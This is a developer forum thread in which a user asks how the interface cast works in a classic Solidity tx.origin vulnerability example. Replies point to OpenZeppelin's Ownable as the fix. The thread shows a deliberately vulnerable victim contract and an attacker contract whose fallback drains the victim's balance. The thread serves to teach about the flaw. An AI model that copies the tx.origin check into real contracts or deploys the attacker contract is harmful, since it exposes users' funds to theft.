What is the purpose of Interface and what is TxOriginVictim(msg.sender)?

zak100 · April 4, 2021, 4:45am

I have two contracts in the context of tx.origin Vulnerability:

pragma solidity ^0.5.8;
contract TxOriginVictim {
   address owner;
   constructor() public{  
      owner = msg.sender;
   }
   function transferTo(address to, uint amount) public {  
      require(tx.origin == owner);  
      (bool success,) = to.call.value(amount)("");
      require(success);
   }
   function() external payable  {}
}

==and the attacker’s contracts is:

pragma solidity ^0.5.8;
interface TxOriginVictim {  
   function transferTo(address to, uint amount) external;
}

contract TxOriginAttacker {
   address owner;
   constructor () public {  owner = msg.sender;}
   function getOwner() public returns (address) {  return owner;}
   function() external payable  {  
      TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);
   }
}

In the TxOriginAttacker contract, I can’t understand the purpose of TxOriginVictim’s interface. What is TxOriginVictim(msg.sender) in the statement:
TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);

Please guide me.

abcoathup · April 6, 2021, 10:30am

Hi @zak100,

Where is this example from? You may want to check with the author, unless someone in the community answers.

zak100 · April 11, 2021, 4:30pm

Hi,
Thanks for your response:

Zulfi.

Yoshiko · April 12, 2021, 1:12am

Was this answer not correct?

It's illustrating a vulnerability in using tx.origin

Which is why in modern solidity development we use

modifier onlyOwner() {
        require(ownerOfToken == _msgSender(), "Ownable: caller is not the owner");  // Throws if called by any account other than the owner.
        _;      // when using a modifier, the code from the function is inserted here. // if multiple modifiers then the previous one inherits the next one's modifier code
    }
~

from Ownable.sol

github.com

OpenZeppelin/openzeppelin-contracts/blob/master/contracts/access/Ownable.sol

// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;

import {Context} from "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {

This file has been truncated. show original

zak100 · April 12, 2021, 3:23am

Hi,
Thanks. StackExchange provided answer to my question and I feel it was correct.

Zulfi.

Topic		Replies	Views
What is purpose of use empty interface? Smart Contracts erc721 , proxies	0	525	December 9, 2021
ERC20 Standard Contract - _msgSender()? Smart Contracts	2	810	April 29, 2022
Question about chaining of Solidity constructors Support	1	573	December 6, 2019
_msgSender() returns the same address as msg.sender Smart Contracts	6	794	February 5, 2023
Contract calls contract - forwarding msg.sender - could tx.origin be the solution? Smart Contracts proxies	7	1074	December 2, 2022

What is the purpose of Interface and what is TxOriginVictim(msg.sender)?

Related Topics